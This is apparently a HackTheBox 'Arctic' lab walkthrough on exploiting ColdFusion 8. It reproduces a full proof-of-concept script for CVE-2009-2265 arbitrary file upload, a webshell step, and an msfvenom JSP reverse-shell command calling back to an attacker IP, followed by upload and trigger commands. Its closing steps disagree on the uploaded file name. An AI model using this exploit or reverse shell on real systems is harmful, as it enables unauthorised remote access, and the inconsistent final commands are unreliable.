HackTheBox - Arctic

Nmap scan results

Remote Procedure Call (RPC) is a protocol that one program can use to request a service from a program located in another computer on a network without having to understand the network's details. RPC is used to call other processes on the remote systems like a local system.
Identifying ColdFusion running on port 8500

The webserver is running ColdFusion 8 and we can check for known vulnerabilities using searchsploit.

Exploiting ColdFusion's Arbitrary File Upload
We can try Arbitrary File Upload module
, as we are not interested in exploiting Cross Site Scripting.
References: https://onecompiler.com/python/3vurkz7hh
# Exploit Author: Alexander Reid
# Vendor Homepage: http://www.adobe.com/products/coldfusion-family.html
# Version: ColdFusion 8.0.1
# CVE: CVE-2009-2265
#
# Description:
# A standalone proof of concept that demonstrates an arbitrary file upload vulnerability in ColdFusion 8.0.1
# Uploads the specified jsp file to the remote server.
#
# Usage: ./exploit.py <target ip> <target port> [/path/to/coldfusion] </path/to/payload.jsp>
# Example: ./exploit.py 127.0.0.1 8500 /home/arrexel/shell.jsp
import requests, sys
try:
ip = sys.argv[1]
port = sys.argv[2]
if len(sys.argv) == 5:
path = sys.argv[3]
with open(sys.argv[4], 'r') as payload:
body=payload.read()
else:
path = ""
with open(sys.argv[3], 'r') as payload:
body=payload.read()
except IndexError:
print 'Usage: ./exploit.py <target ip/hostname> <target port> [/path/to/coldfusion] </path/to/payload.jsp>'
print 'Example: ./exploit.py example.com 8500 /home/arrexel/shell.jsp'
sys.exit(-1)
basepath = "http://" + ip + ":" + port + path
print 'Sending payload...'
try:
req = requests.post(basepath + "/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/cmd.jsp%00",
files={'newfile': ('exploit2.txt', body, 'application/x-java-archive')}, timeout=90)
if req.status_code == 200:
print 'Successfully uploaded payload!\nFind it at ' + basepath + '/userfiles/file/cmd.jsp'
else:
print 'Failed to upload payload... ' + str(req.status_code) + ' ' + req.reason
except requests.Timeout:
print 'Failed to upload payload... Request timed out'
Let's upload a cmd.jsp file. You can get the cmd.jsp
file from here.

The webserver is taking a lot of time to process a single request. So it might take some time for uploading the payload.
After the webshell gets uploaded, we can try a simple command to test it out.

Generating JSP Reverse Shell using MSFVenom
Now I will upload a reverse shell instead of running commands on the webshell, as it takes a hell lot of time.
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f raw > shell.jsp
python exploit.py 10.10.10.11 8500 shell.jsp
curl http://10.10.10.11:8500/userfiles/file/reverse.jsp

Last updated
Was this helpful?